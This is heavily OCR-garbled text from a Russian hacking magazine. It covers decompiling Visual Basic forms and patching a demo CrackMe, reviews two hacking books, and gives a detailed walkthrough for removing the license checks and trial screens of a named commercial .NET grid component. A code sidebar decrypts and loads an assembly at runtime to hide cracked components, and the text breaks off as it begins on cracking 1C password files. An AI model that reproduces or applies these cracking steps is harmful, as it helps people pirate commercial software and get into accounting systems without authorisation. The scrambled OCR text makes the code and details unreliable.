ванном виде каждый объект начинается со свой- 
ства Мате и заканчивается идентификатором, по 
которому можно выяснить, идут ли другие объек- 
ты дальше, вложенность объектов и их заверше- 
ние, также меню. Свойства чередуются крайне 
просто: сначала идет идентификатор свойства, 
затем — само значение, за ним — следующий 
идентификатор. Идентификаторы FFOO-FFO5 за- 
резервированы. Вот их описание: 


Перед нами встает такая проблемка: откуда брать 
идентификаторы всех свойств всех контролов? 
Решение очень простое. Я уже составил таблицу 
путем выдирания этих свойств из TypeLib’os VB и 
их многочисленных исправлений (таблицу можно 
найти на прилагаемом к журналу диске). А сейчас 
приступим к реальному примеру (листинг 1). 

Смивол OD указывает на то, что имя формы 
содержит ОБН символов. Далее идет имя "АС_Ех- 
Dec_03_B", оно завершается нулевым байтом, за- 
тем — вновь ООН. Следующий байт 01h определя- 
ем по таблице для формы — это Сарйоп. Следова- 
тельно, за ним должна идти длина строки и сама 
строка. Со строками в VB не все гладко: в некото- 
рых свойствах объектов он хранит строки в ACIIZ- 
формате, а в других — в Unicode-cbopmate. 

Распознать формат невозможно. Един- 
ственный способ — просто запомнить, какие 
свойства имеют Unicode-cbopmat, а какие — ка- 
кой-то другой. К примеру, Caption и Мате — всег- 
да в ASCII, Ho Tag, Connect и некоторые другие 
имеют Упсоде-формат. 

Вернемся к нашим данным. 03 — это 
BackColor согласно нашей таблице. Следователь- 
но, следующие 4 байта отвечают за 32-битный код 
цвета. Далее идет 19 — ScaleMode. Следующий за 
ним Word определяет масштаб. 42 — WhatsThis- 
Button, за ним — 1 байт, определяющий логиче- 
ское True (FF) или False (0). Перейдем к самому 
интересному, что есть в формах, — к следующему 
байту 23 (это Icon). Вообще при программирова- 
нии на VB формы хранятся в файле frm, а графи- 
ка и прочие большие данные — в frx. frm в свою 
очередь ссылается на определенный адрес в этом 
frx, в котором хранит все используемые данные 
один за другим. После компиляции содержимое frx 
встраивается в форму, поэтому в рассматривае- 
мом случае после байта 23 будет идти иконка в 
формате stdole.Picture. Если берется иконка по 
умолчанию из MSVBVM6O.DLL, то после 23 мы 
увидим FFFFFFFF (в противном случае — размер 
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Листинг 2 
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Листинг 3 


картинки). Именно столько байт мы должны счи- 
тать после адреса, чтобы получить всю использу- 
емую иконку. ЗЕ 04 00-00 = 43E = 1086 байт. Имен- 
но через столько байт кончится иконка и продол- 
жится форма, которую мы декомпилируем 
(листинг 2). 

Теперь видим 24 — это LinkTopic. После не- 
го идет строка. Мы уже умеем доставать строки, 
поэтому пойдем дальше. В таблице нет опкода 
35, но я расскажу, что он представляет собой все- 
го лишь линейные размеры клиентской части 


формы. За байтом 35 идут четыре dword'a: Client- 
Left, ClientTop, ClientWidth, ClientHeight соответ- 
ственно. Затем видим 46 (StartUpPosition) — один 
байт, определяющий позицию формы при запуске 
(в центре экрана, где получится или в центре Ра- 
геп-формы). 

Вот мы и дошли до самого интересного — 
FFO1. Я уже говорил о константах, определяющих 
конец одних контролов или начало других. FFO1 — 
это vbFormNewChildControl. Он определяет, что 
далее идет контрол, контейнером для которого 


HE ЗАБЫВАЙ, ЧТО ИС- 


СЛЕДОВАНИЕ ЧУЖИХ 
ПРИЛОЖЕНИЙ — ЭТО 
ВСЕГДА ЗЛО. ТАК ЧТО 
ХОТЯ БЫ ИЗРЕДКА ПО- 
ГЛЯДЫВАЙ, НЕ НАРУША- 
ЕШЬ ЛИ ТЫ ЛИЦЕНЗИЮ, — 
ИЗБЕЖИШЬ ВНЕПЛАНО- 
ВОГО ГЕМОРРОЯ 


является форма. Сначала стандартно: dword — 
размер информации о следующем контроле. За- 
тем — имя контрола. 

Дальше пошли свойства. 01 — Caption, 03 — 
BackColor, 04 — ForeColor, 05 — линейные размеры. 
Декомпилируются подобно линейным размерам 
клиентской части формы, с одной небольшой разни- 
цей: каждый из размеров занимает не 4, а 2 байта. 

12 (Tablndex) — индекс, используемый для 
перечисления контролов на формы при нажатии 
<Tab>. Многие программисты забывают проста- 
вить его после разработки программы, поэтому 
любители работать на компьютере не прикасаясь к 
мыши плюются и ругают программу и руки автора. 
Я поддерживаю их гнев — программист обязан вы- 
ставить это свойство, так как иначе он не соблюдет 
правило профессиональной разработки интерфей- 
сов. Этот индекс определяется двумя байтами, что 


"fata Табе 4 


И на этот раз декомпилятор раскусил злой 
замысел шароварщика 


означает: на форму невозможно поместить более 
65535 контролов. Затем идет 1В. Одно из самых 
интересных свойств — Font. В отличие от других, 
оно описывается классом stdole.Font, который есть 
только в VB. Так что писать декомпилятор VB не Ha 
VB — это большой геморрой, именно из-за клас- 
COB, зашитых в библиотеки VB. 

В конце всех контролов видим FFO204. Kak ты 
помнишь, 02 — это vbFormExistingChildControl. Если 
ты закрываешь контрол, 04 (vbFormEnd) закрывает 
форму. Смотри, что получилось бы, если бы мы за- 
писывали то, что декомпилировали в уме (листинг 
взят из моего декомпилятора VB Decompiler): 
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| tecompiled Gk 


Средство для исследования \УВ-программ 


в декомпиляторе отчетливо видно, 
что нужно патчить 


Теперь предлагаю на конкретном примере разблокиро- 
вать залоченное меню и показать невидимую кнопку. 
разлочиваем меню. Специально для демон- 
страции я написал простенький CrackMe. 

В нем заблокирован пункт меню «Сохра- 
нить», как часто устраивают в коммерческих про- 
граммах. Попробуем разблокировать. Какие же 
способы есть для того, чтобы сделать меню неак- 
тивным? Существует всего два пути. Первый — 
при проектировании поставить свойство Enabled в 
False меню. Второй — установить это свойство ко- 
дом при запуске формы. Предположим, кодер по- 
ленился и установил это свойство при разработке 
меню. Мы же декомпилируем этот проект и посмо- 
трим, что получилось. Для простоты не будем за- 
ново декомпилить в уме, а возьмем мой декомпи- 
лятор (е-версия вполне подойдет) и пустим его в 
дело. В разделе «Формы» находится всего одна 
форма. Поищем там меню: 


У 


т 


On-na! «Enabled = 0» — то, что мы искали. Теперь 
подумаем, как поправить. Откроем программу в 
HIEW и перейдем по адресу 11F0 (листинг 3). 

Все стандартно. Сначала Мате, затем Сар- 
tion (03) и 05 — Enabled. Дальше идет один байт 
006, что означает False. Замени его на FF (True) и 
попробуй запустить. При нажатии на меню разбло- 
кировки выводится MessageBox «cool». Вот и все! 
3 oTnasnusaen invisibles. Несмотря на 1СО’шный 
стиль заголовка, мы не будем писать плагин опре- 


тые кнопки видимыми. 
Для большего реализма я написал CrackMe, 
который делает кнопку «Сохранить» видимой че- 


и 


Сразу бросается в глаза «Visible = 0» (в таблице 
оно значится как 09). Переходим по смещению 
1175 и проходим все свойства до 09. Видим 00 
(это False), меняем его на FF (True) — отлично, 
дело сделано. Но! Мой CrackMe был сделан спе- 
циально так, чтобы можно было взломать его 
разными способами. 

Рассмотрим еще один способ: как сделать 


кнопку видимои через три секунды. Можно сделать 


граммисты страшатся этого и пользуются таймера- 
ми (невидимыми контролами на форме, у которых 
событие срабатывает каждые Interval миллисе- 
кунд). Поищем любимый таймер на форме: 


143 


Таблица 1. Структура VBHeader 


Поле Тип Описание 

Signature String * 4 Сигнатура "VB5!" 

RuntimeBuild Integer Показатель рантаймовости 

LanguageDLL String* 14 — Языковая библиотека 

BackupLanguageDLL String* 14 He влияет на работу EXE 

RuntimeDLLVersion Integer Версия рантайм-библиотеки 

LanguagelID Long Язык программы 

BackupLanguagelD Long Используется совместно с 

LanguageDLL aSubMain Long Мат-процедура, запускаемая при старте EXE. 
Если отсутствует, то при загрузке грузится 
самая первая форма 

aProjectinfo Long Указатель на структуру Projectinfo 

fMDLIntObjs Long 

fMDLIntObjs2 Long 

ThreadFlags Long Флаги потока 

ThreadCount Long Число потоков (смысл малопонятен, так как VB 
не позволяет создавать многопоточные программы) 

FormCount Integer Число форм в данном файле 

ExternalComponentCount Integer Число внешних ОСХ-компонентов 

ThunkCount Long 

aGUITable Long Указатель Ha GUITable 

aExternalComponentTable Long Указатель Ha ExternalComponentTable 

aComRegisterData Long Указатель Ha ComRegisterData 

oProjectExename Long Адрес строки с именем ЕХЕ-файла 

oProjectTitle Long Адрес строки с заголовком проекта 

oHelpFile Long Адрес строки с именем Нер-файла 

oProjectName Long Адрес строки с именем проекта 


Так и есть! 3000 миллисекунд — это три секунды. 
Заменим их на одну. Однако автор забыл поста- 
вить End после установки свойства в кнопку, поэ- 
тому после события таймер будет срабатывать и 
дальше, и поэтому программа начнет тормозить. В 
этой ситуации выгоднее и проще использовать 
предыдущий способ, а таймер — просто отклю- 
чить, поставив интервал в 0. 

> новые свойства. Читая статью, ты наверняка 
задался вопросом о том, как добавить новое свой- 
ство в упакованный контрол? Единственный спо- 
соб — разбор, вставка и затем сборка всей формы. 
Ясно, что данные не поместятся на старое место, по- 
этому придется создавать новую секцию в файле 
или расширять последнюю и редиректить данные 
туда. Кроме того — прописать адрес на новое рас- 
положение формы в структуре информации о фор- 


ме. Притом учитываем, что если пользователь будет 
часто добавлять свойства, то заранее в новой сек- 
ции нужно сделать запас в виде резервных байт под 
расширение каждой формы. Придется хранить всю 
эту информацию о резерве байт и начале и длине 
каждой формы, вынесенной в новую секцию. Для 
этого создается своя служебная структура. 

Все это будет полезно только если ты возь- 
мешься писать свой редактор ресурсов VB. Если 
же просто собираешься исследовать программы, 
то знаний этой статьи вполне достаточно. 
> вот и все! Надеюсь, у тебя не осталось во- 
просов по редактированию интерфейса \В-про- 
грамм. Если все-таки осталось, задавай их на мо- 
ем форуме, посвященном вопросам декомпилиро- 
вания VB (http:/vbdecompiler.dotfix.net), Периодически 
я читаю его и отвечаю на вопросы № 


Таблица 2. Структура tGuiTable 


Поле Тип Описание 

SectionHeader Long Адрес заголовка, описывающего секции 

unknown(59) Byte Неиспользуемый блок-байт 

FormSize Long Размер блока, описывающего форму и контролы, 
лежащие на ней 

un1 Long еиспользуемый DWORD 

aFormPointer Long Указатель Ha блок, описывающий форму 
и контролы, лежащие на ней 

ип2 Long еиспользуемый DWORD 


44|NABOPATOPHA ВЗЛОМА 


Хакинг: искусство 
эксплойта 


СПб.: Символ-Плюс, 2005 
Эриксон Д. / 240 страниц 
Разумная цена: 236 рублей 


Есть много книг, в которых 

эксплойты описаны поверх- 
ностно. Прочитал ты какую-нибудь из них, 
но в тему не вник, поэтому не сможешь со- 
творить что-либо реальное самостоятель- 
но — не хватит базы. Чтобы начать мыслить 
как хакер, нужно проникнуться духом и тео- 
рией хакинга, и только потом осилишь 
собственные эксплойты или сможешь проти- 
востоять атакам на собственную систему 
(кому что ближе). 

Эта книга как раз для тех, кто отно- 
сится к хакингу серьезно. Теория и нагляд- 
ные примеры покажут, как создают 
эксплойты, как пишут собственный полимо- 
рфный шелл-код, как преодолевают запрет 
на выполнение в стеке, как перенаправля- 
ется сетевой трафик и перехватываются 
ТСР-соединения, как расшифровываются 
данные беспроводного протокола 802.116 
и многое другое. 


Хакинг 
аппаратных средств 


М.: ЗАО «Новый 
издательский дом», 2005 
Максим Левин / 288 страниц 
Разумная цена: 130 рублей 


Далеко не только прог- 

раммное обеспечение 
становится жертвой взлома. Более того, 
утверждают, что первый хак был именно 
«железным». К примеру, автомеханик-лю- 
битель 50-х годов разукрасил свой 
Chevrolet Fleetline и поставил на него дви- 
гатель с турбонаддувом — тоже, по сути, 
«железный» хакинг. 

Берешь обыкновенное бытовое уст- 
ройство и превращаешь его в уникальное 
произведение — получается как раз «же- 
лезный» хак. 

С этой книгой ты сможешь модифици- 
ровать множество устройств от Macintosh’a 
до сотового телефона. Конкретные приме- 
ры: создание собственного терабайтного 
жесткого диска, домашний театр на домаш- 
нем компьютере, модификация приставок 
Atari, модификация Playstation, что можно 
сделать c iPOD ит.п. 


ВЗЛОМ КОМПОНЕНТОВ НА ПРАКТИКЕ 


ЭТА СТАТЬЯ ПОВЕСТВУЕТ О ПРИНЦИПИАЛЬНЫХ ОСОБЕННОСТЯХ ВЗЛОМА .NET-KOM- 
ПОНЕНТОВ. КАК ИЗВЕСТНО, КОМПОНЕНТ — ЭТО ПРОГРАММНЫЙ ПРОДУКТ ДЛЯ РАЗ- 
РАБОТЧИКА. СМЫСЛ КОММЕРЧЕСКИХ КОМПОНЕНТОВ ЗАКЛЮЧАЕТСЯ В ТОМ, ЧТОБЫ 


ЭКОНОМИТЬ ВРЕМЯ |NIM{UINTS TEAM}(NIMGINT3.RU) 


вскрытие 


NET. 


Возьмем такой пример. Команда разработчиков 
пишет корпоративный заказ (некая компания зака- 
зала им разработку программы). По плану команде 
также предстоит разработка некого компонента, но 
у программистов и без того дел по уши. Как обыч- 
но, они не успевают в срок :). В результате шеф че- 
шет репу и думает, стоит ли нанимать еще одного 
человека для написания необходимого компонента 
и платить ему $1000 в месяц, если за эти же деньги 
можно купить готовый компонент. Чаще всего вы- 
бирают последнее. Весь этот процесс я наблюдал 
не раз. Если бы не коммерческое обстоятельство, 
вряд ли мне пришлось бы писать эту статью. 

Самые распространенные компоненты пред- 
ставляют собой элементы графического интер- 
фейса: button, progress bar, editbox, listbox, combo- 
box, grid и т.д. Такие компоненты иногда называют 
контролами. Grid-KOHTpon, пожалуй, в реализации 
оказывается одним из самых сложных. Почти 
всегда он является центровым, и часто случается 
такое, что хитрыми маркетинговыми телодвиже- 
ниями вместе с ним кто-то пытается продать дру- 
гие, чаще всего просто ненужные контролы. Се- 
годня мы будем рассматривать реверсинг компо- 
нентов именно на примере Сиа-контрола. 
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Как ты уже догадался, Grid-koHTpon — это табли- 
ца. СиФы весьма разнообразны по функционалу: 
от умеющих работать напрямую с источниками дан- 
ных DataSource до позволяющих создавать Nested 
Tables (вложенные таблицы). 

> главные характеристики Grid-KoHTpona — 
это, во-первых, скорость рендера, во-вторых, эко- 
номия памяти, скорость добавления новых эле- 
ментов, надежность и удобство использования. 
Всей этой прелести можно достичь с помощью так 
называемой технологии Virtual Render Control, при 
которой происходит прорисовка не всего контро- 
ла, а только части, находящейся в View Region 
(область, которую может видеть пользователь). 
Конечно, то, что видит пользователь, и то, что ри- 
сует Grid, — два разных понятия. К примеру, в тво- 
ем Grid’e есть 1000 элементов, но в данный мо- 
мент ты можешь видеть только 20. Grid все равно 
прорисовывает 1000, из них 980 рисует в невиди- 
мой части. Но он рисует их и тратит время! Вот по- 
чему Grid должен заранее знать, сколько элемен- 


тов пользователь видит, и рисовать только то, что 
доступно взгляду (в нашем случае должно рисо- 
ваться только 20 элементов). Данная технология 
позволяет прорисовывать контрол с одинаковой 
скоростью, в то же время количество элементов 
никогда не повлияет на скорость скролла. 

Здесь можно уделить особое внимание 
именно прокрутке. Некоторые из native Grid-KoH- 
тролов, встречавшихся мне, реализуют Virtual 
Render Control — делают скроллинг построчно, то 
есть благодаря им при прокрутке текст двигается 
дискретно, как бы перемещаясь из одной невиди- 
мой строки в другую. Этот способ реализации тех- 
нологии Virtual Render Control легче, чем попик- 
сельный скроллинг. Более того, наличие попик- 
сельного скроллинга свидетельствует о высоком 
профессионализме изготовителей-программи- 
стов, так как такая реализация требует высокой 
производительности и самого контрола в целом, и 
модели доступа к элементу контрола. 

Однажды, когда я написал собственный 11-ди- 
зассемблер, мне потребовался такой .МЕТ-контрол, 
который выделял бы пространства имен, классы и 
методы в отдельные структуры Nested Tables. Стал 
искать подходящий. Нашел много красивых, удоб- 
ных, HO НИ ОДИН ИЗ нИХ не реализовывал Virtual Веп- 
der Control. Как результат, большие потери памяти, 
медленная прорисовка и невозможный скроллинг. К 
примеру, при дизассемблировании стандартной би- 
блиотеки mscorlib.dll и отображении в XceedGrid было 
растрачено 1450 Мб памяти, элементы добавлялись 
40 минут, а рендеринг происходил за 45 секунд. Где 
это видано? Когда я написал службе технической 
поддержки, мне посоветовали привести все вложен- 
ные элементы в свернутый вид. Что же получается? 
Я должен постоянно щелкать на нужных элементах, 
что обламывает — намного удобнее крутить третью 
кнопку мыши. Впрочем, и остальные Grid’b! He отли- 
чались могучей производительностью. 

Сейчас пошла мода на поддержку дизайнера 
форм, но зачем делать ее для элемента? Я никог- 
да так и не пойму этого. Лишний раз затрачивает- 
ся память, притом затраты умножаются на количе- 
ство элементов! По возможности я стараюсь выне- 
сти поля класса (константы) из элемента куда-ни- 
будь в статику, чтобы он занимал меньше памяти 
и работал быстрее. Ясно, конечно, что красота 
(точнее, красота и удобство разработки) требует 
жертв, но я всегда делаю выбор в пользу быстро- 
действия и производительности. Из-за программи- 
стов .МЕТ, нелепых и искушенных легкостью ис- 
пользования тормознутых технологий, и распро- 
странилось стойкое предубеждение о .МЕТ как о 
великом тормозе. Как бы не так! Для решения про- 
блемы мне пришлось написать собственный кон- 
трол: при отображении листинга библиотеки 
mscorlib.dll затрачивается всего 4,5 Мб памяти, 
рендер происходит за ~0,081 секунды, добавление 
всех элементов — -0,8 секунд, прилагается попик- 
сельный скроллинг. В моем Grid’e нет наворочен- 
ной поддержки дизайнера форм и всяких примо- 
чек, зато он простой, быстрый и красивый. 


> матчасть. Для опытов возьмем компонент 
C1TrueDBGrid, взятый с сайта www.purecomponents.com, 
Этот Grid-KoHTpon сделан в одной из ведущих ком- 
паний по производству компонентов. Работа будет 
идти следующим образом. Берем любой пример, 
поставляемый с компонентом, компилируем его, в 
папке проекта находим появившуюся папку \deb- 
ug\bin. Переходим в нее, дизассемблируем: 


Для ассемблирования нужно удалить (в Studio) 
этот контрол из References. И только потом делать 


Точно так же поступаем при каждом ассемблиро- 
вании. Иначе при ассемблировании выйдет ошиб- 
ка: Failed to write output file, error code=0x80070020. 
Это значит, что файл занят Studio u она не позво- 
ляет перезаписывать его. Если твои действия бы- 
ли правильными, ты сможешь трассировать ком- 
понент в том же окне Studio, где находится и сам 
пример его использования. Однако при первом за- 
пуске сразу получаем ошибку: «Сбой при проверке 
строгого имени для сборки 'C1.Win.C1TrueDBGrid'». 
Это цифровая подпись, именуемая Strong Name. 
В других моих статьях в этом СПЕЦе я много пи- 
сал о ней, не буду повторяться. Для удаления 
подписи нужно закомментировать атрибуты .сч- 
stom instance void [mscorlib]System.Reflection.As- 
semblyKeyFileAttribute::.ctor(string) и .publickey. 
Прошу не удалять код, лучше помещать его в 
комментарии. 

В этой статье я часто говорю о «номерах 
строк». Если какие-то строки будут удалены, то, 
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соответственно, и нумерация строк изменится. 
Наше исследование начинается с того, что мы 
обнаруживаем в конструкторе C1TrueDBGrid вот 
такую строку: 


Здесь контрол использует стандартные возмож- 
ности проверки лицензии с помощью класса Sy- 
stem.ComponentModel.LicenseManager. Как вид- 
но из вызова, результат присваивается приват- 
ному полю класса private License OWB. Чтобы 
упростить задачу по выявлению всех участков 
кода, которые обращаются к этому полю, мы 
просто удалим его. К сожалению, компилятор не 
выдает нам ошибки в местах, где используется 
данное поле, но когда запустим приложение, 
ошибки выявятся. 

Открою несколько секретов быстрой навига- 
ции по 11 -коду в VS2003. Зайти в меню Edit > Find 
& Replace > Find или просто нажать <Ctrl>+<F>, 
поставив галочку в пункте Use. Выбрать в combo- 
Бох’е опцию Wildcards (что-то вроде языка подста- 
новочных символов в поисковике файлов 
Windows). Теперь, чтобы найти наш класс, мы вво- 
дим такой запрос: [.]class*C1TrueDBGrid. И оказы- 
ваемся в начале класса. Необходимое нам поле 
находится ниже. По запросу [.]field*OWB находим 
его в строке 74357, закомментируем его, а заодно 
найдем и закомментируем заполнение этого поля 
в конструкторе класса [.]Jclass*C1TrueDBGrid -> 
[.]method. 

Здесь есть два обращения к этому полю. При 
первом полю присваивается null. Тут комментиру- 
ем строки IL_OOae*IL_OObO (здесь и далее знак * 
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Простой, быстрый и красивый Grid 


указывает, что нужно комментировать все строки 
между этими метками включительно). Во втором 
обращении происходит заполнение поля объектом 
License, о чем я уже говорил. Комментируем 
IL_OOc6*IL_O00d7. Компилируем, запускаем — и 
oro! Trial’Hoe окно больше не появляется. 

> — вот самый быстрый взлом .МЕТ-компонента 
из всех проделанных мной. Прошло около трех 
минут! Оказалось, что взятое мной поле не ис- 
пользуется нигде больше. Теперь, пожалуй, сто- 
ит немного почистить компонент от мусора. Пер- 
вая вещь, которая относится к мусору, — это са- 
ма ШаГная форма. 

Второе зло — trial’Hoe окно. Когда в дизай- 
нере формы мы добавляем контрол на форму, 
после щелчка на нем правой кнопкой мыши 
можно увидеть в контекстном меню элемент 
About ComponentOne C1TrueDBGrid. При ero вы- 
боре появляется trial’HOoe окно, которое мы и со- 
брались удалить. 

Самый быстрый и легкий способ узнать, ка- 
кой класс создает окно, — сделать бряк в тот мо- 
мент, когда оно появилось, то есть нужно просто 
перейти в отладчик и нажать <Ctrl>+Break. Итак, 
возвращаем все изменения, сделанные нами в ме- 
Tone C1TrueDBGrid::.ctor, и запускаем. Когда же 
появится trial’Hoe окно, брякаем. Чтобы узнать, в 
каком классе мы оказались, делаем SerchUP 
[]<1аз$ -> [.]NameSpace. 


Итак, мы находимся в методе C1.Win.0V::Y3. В Ве- 
Несоге посмотрим этот метод и класс на наличие 
полезного кода. Забыл сказать, что в последних 
версиях ВеНесюга добавлена возможность узна- 
вать, где используется данный класс, метод или 
поле. Для этого на элементе дерева классов вызы- 
ваешь контекстное меню и нажимаешь Analyser. В 
появившемся окне увидишь два элемента: De- 
pends Оп и Used Ву («Зависит от» и «Использует- 
ся в» соответственно). Быстро просмотрев 19 
классов C1.WIN в анализаторе, мы обнаружили, 
что только пять используются за пределами про- 
странства имен C1.WIN и все так или иначе отно- 
сятся к мусору. Их тоже заносим в корзину. 


iil 


Получается, что если эти 19 классов будут удале- 
ны, компонент неплохо похудеет :). Так зачем на- 
шей программе лишний вес? Как видно по табли- 
це, первые три класса используются в виде атри- 
бутов сборки (врезка 1 — «Атрибуты сборки»). 

Итак, комментируем строки 73*88. Далее 
на очереди два обработчика события в классах 
TDBDropDesigner и TDBGridDesigner. Когда уда- 
ляешь метод обработчика события, вместе с 
ним необходимо удалить строки кода, которые 
навешивают на Hero EventHandler. Правильные 
программисты делают это в методе инициализа- 
ции void Initialize, который создается автомати- 
чески при создании форм и контролов и вызы- 
вается из конструктора класса. Начнем с метода 
TDBDropDesigner::DisplayAboutBox. Находим 
его в листинге: [.]class*TDBDropDesigner -> Dis- 
playAboutBox*object и комментируем в строках 
142891*142901. Теперь удалим инициализацию 
EventHandler. Заходим в метод [.]с!аз5*ТОВОгор- 
Designer -> Initialize. 

В Нейесюге (C#) To, что мы должны заком- 
ментировать, выглядит так: this.get_Verbs().Add(new 
DesignerVerb(11.Z1("About ComponentOne C1True- 
DBGrid..."), new EventHandler(this.DisplayAboutBox))), 
ав IL этот код находится по меткам IL_0018*IL_003e. 
Нужно закомментировать его, и тем самым убьем 
еще одного зайца: теперь в контекстном меню 


контрола, когда мы находимся в дизайнере фор- 
мы, не будет меню About ComponentOne C1True- 
DBGrid. Однако если просто перекомпилировать 
контрол, изменения не будут видны. Дело в том, 
что Studio имеет свой собственный референс, поэ- 
тому дизайнер форм смотрит не на наш модифи- 
цированный контрол, а на оригинал. Чтобы уви- 
деть изменения, заходим в дизайнер форм, удаля- 
ем с формы контрол, добавляем наш контрол на 
панель контролов, рисуем этот Grid на форме еще 
раз. Теперь все изменения видны. То же самое 
проделаем с классом TDBGridDesigner. 

> остался последний, пятый пункт. Находим 
метод [.]Jclass*TDBGridDesigner -> Initialize. Коммен- 
тируем инициализацию EventHandler по меткам 
IL_0018*IL_003e. Далее находим метод, обрабаты- 
вающий данное событие DisplayAboutBox*object. 
Комментируем строки 143177*143187. 

Класс CiTrueDBGrid наследует реализа- 
цию от интерфейса C1.Win.U. В Reflector’e смо- 
трим на этот интерфейс. Он содержит всего один 
метод — Assembly GetCallingAssembly(), а зна- 
чит, в классе C1TrueDBGrid тоже есть этот метод 
(он наследуется от данного интерфейса). При- 
дется удалить, поскольку теперь никто не будет 
вызывать его, но на всякий случай перед удале- 
нием проверим анализером, где он использует- 
ся. Получается, что нигде? На самом деле все- 
таки используется, но по-хитрому. Вспомни на- 
чало статьи — то место, где делали исправление 
в конструкторе класса 


В этой строке в виде параметра передается ссы- 
лка this (ссылка на текущий класс). LicenseMana- 
ger в свою очередь проверяет, имеет ли этот 
объект атрибут <МсепзеРгомаек(...)>. В виде napa- 
метра должен выступать класс, производный от 
System.ComponentModel.LicenseProvider. Если все 
нормально, то LicenseManager создает объект 
с заданным в атрибуте типом, где и происходит 
проверка ключа. В нашем случае ключ проверяет- 
ся в классе С1 мип.Ргомаейпю. 

Вдруг в мою голову пришла мысль о том, 
что было бы неплохо удалить данный атрибут. 
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Haw подопытный GRID-control в действии 


Схема этого встроенного лицензирования сво- 
дится к тому, что платформа .МЕТ делает Call- 
Back, создавая объект, указанный в виде параме- 
тра атрибута <LicenseProvider(...)>. Наверное, 
в Microsoft считают, что в хорошо обфусцирован- 
ном коде найти проверку ключа тяжело, при усло- 
вии что вызов проверки пойдет через этот стран- 
ный CallBack. До Toro как начал писать статью, я 
не имел даже представления о том, как это рабо- 
тает, но разобрался менее чем за пару минут. 
Однако вернемся к делу. 

Во-первых, нужно удалить интерфейс 
C1.win.U из списка наследуемых интерфейсов. Ha- 
ходим класс [.]Jclass*C1TrueDBGrid и видим строку 
implements C1.Win.U. Она должна выглядеть так: 
implements /*C1.Win.U,*/ . 

Немного ниже есть и атрибут: .custom instan- 
се void [System]System.ComponentModel.License- 
ProviderAttribute. Ero тоже комментируем. Теперь 
находим метод GetCallingAssembly(), который Ha- 
ходится в строках 74511*74521. 

Наконец-то мы избавились от всего кода, 
использующего классы пространства имен C1.Win, 
и теперь их можно подвергнуть благополучному 
удалению. Находим начало C1.Win [.]Матезра- 
ce*C1.Win и, начиная со строки 144314 до строки 
156166, комментируем этот код. Целых 11 тысяч 
строк Ш-кода :), причем это еще не все. В листин- 
ге все классы и пространства имен существуют 
в коротком формате — тут представлен своего 
рода каталог, который описывает структуру сбор- 
ки, и классы в нем пустые. Указывается только 
название класса и его атрибуты, такие как базо- 
вый класс, список интерфейсов, которые он обя- 
зуется реализовывать. Так что здесь мы должны 
также продублировать изменения. Закомменти- 
руем интерфейс C1.Win.U у класса C1TrueDBGrid 
в строке 606. Закомментируем и 19 классов в 
строках 1408*1499. 

Теперь уделим внимание ненужным ресур- 
cam. Их использовали ШаРные формы, которых 
теперь нет. Соответственно, из !1-листинга нужно 
удалить и сами ресурсы. Описание ресурсов на- 
чинается со строки 102. Необходимо закомменти- 
ровать ресурсы: C1.Win.LicensingForm.resources, 
C1.Win.BetaAboutForm.resources, C1.Win.About- 
Form.resources. 

Теперь возвращаем наши исправления 
в конструкторе класса C1TrueDBGrid (они были 
проделаны в начале статьи, но потом мы отмени- 
ли их). Компилируем, запускаем и видим, что все 
работает прекрасно. Теперь скомпилируем еще 
раз, но без флага /debug. В итоге размер файла 
составил 784 Кб, а размер оригинала — 888 Кб. 
Своими манипуляциями мы сэкономили 104 кило- 
байта. Думаю, 15 минут работы стоили того. Одна- 
ко нужно отметить еще один момент. 
> если .МЕТ-компоненты используют другие 
сборки, то может быть задействована круговая 
ссылка зависимости, то есть в Reference сборки 
1 будет ссылка на сборку 2, а в Reference c6op- 


рг1уабе void RunCrypt (string File) 


System.10.FileStream FS2 = 
System.1I0.FileMode.Open) ; 


System. Security.Cryptography.CryptoStream CS2 = 


new System.IO.FileStream(File, 


GetIO(FS2, 


System. Security.Cryptography.CryptoStreamMode. Read) ; 


BinaryReader BR = new System.IO.BinaryReader (CS2) ; 


System.Reflection.Assembly Asm = System.Reflection.Assembly.Load(B, u!!); 
Type ModType = Asm.GetType("AnyNamespace.FormMain", true, true); 


object Obj 
Obj .GetType() . InvokeMember ("Show", 
System.Reflection.BindingFlags.Public, 


= Asm.CreateInstance (ModType.FullName) ; 


null, null, №911); 


private System.Security.Cryptography.CryptoStrea 


etIO(System.10.FileStream FS, 


System. Security.Cryptography.CryptoStreamMode Mode) 


System. Security.Cryptography.DESCryptoServiceProvider Des = null; 


byte[] К = new byte[] 

Е 88, 23, 
bytel] V = mew bytel]i}; 
Des.Key = K; 


System. Security.Cryptography.ICryptoTransform Trans; 
(Mode == System.Security.Cryptography.CryptoStreamMode.Write) 


Trans = Des.CreateEncryptor(); 


Trans = Des.CreateEncryptor(); 


return new System.Security.Cryptography.CryptoStream(FS, 


ки 2 — ссылка Ha сборку 1. При таком раскладе 
модификация любой из сборок просто приведет 
к ошибке загрузки сборки. Получается, что нуж- 
но убирать информацию о версиях и публичных 
ключах этих сборок. Вот пример ссылки на дру- 
гую сборку: 


-assembly extern System.Windows.Forms 


{ 
-publickeytoken = 
ever 0320050 
} 


(ВХ TASC 56 19: 34 BO) 89} 


Она должна выглядеть так: 


-assembly extern System.Windows.Forms 


Trans, Mode) ; 


Нас настигнет та же самая проблема, если мы из- 
меняем сборку, от которой зависит несколько дру- 
гих сборок. Придется сделать исправление во всех 
сборках. 

> заключение. Некоторые несознательные 
личности, чтобы использовать в своих корыстных 
целях взломанные компоненты, упаковывают или 
шифруют сборки и хранят все это хозяйство либо 
во внешнем файле, либо в ресурсах, а при запус- 
ке программы расшифровывают и запускают ди- 
намически. Несмотря на то, что простой пример 
этого вынесен не врезку, которую ты можешь ви- 
деть чуть выше этого текста :), мы искренне ве- 
рим, что ты не используешь полученные знания 
во вред толстеньким зарубежным программис- 
там, а просто будешь в курсе. Предупрежден — 
значит вооружен :). 

Удачи! Пей Фанту, будь Бамбучо! A 


НЕ ЗАБУДЬ 
ЗАГЛЯНУТЬ 
НА ДИСК — 
ТАМ ТЕБЯ ЖДЕТ 


НЕБОЛЬШОЙ 
БОНУС 
К СТАТЬЕ 


Мой опыт 1С-ника показывает, что злоумышлен- 
ники в основном пытаются ломать файл users.usr. 
Он находится по адресу: каталог_с_базой\изгае! 
\users.usr и хранит информацию о пользователях 
и их паролях. Пароли хранятся в виде хэшей: 
МО5(ра$$), поэтому просмотреть пароль просто 
так не выйдет. Существуют брутфорсеры МО5 
(именно для 1C), а также есть возможность ски- 
нуть пароли всех пользователей. Однако сброс 
всех паролей мгновенно вызовет подозрение ад- 
минов или бухгалтеров. Я протестировал такой 
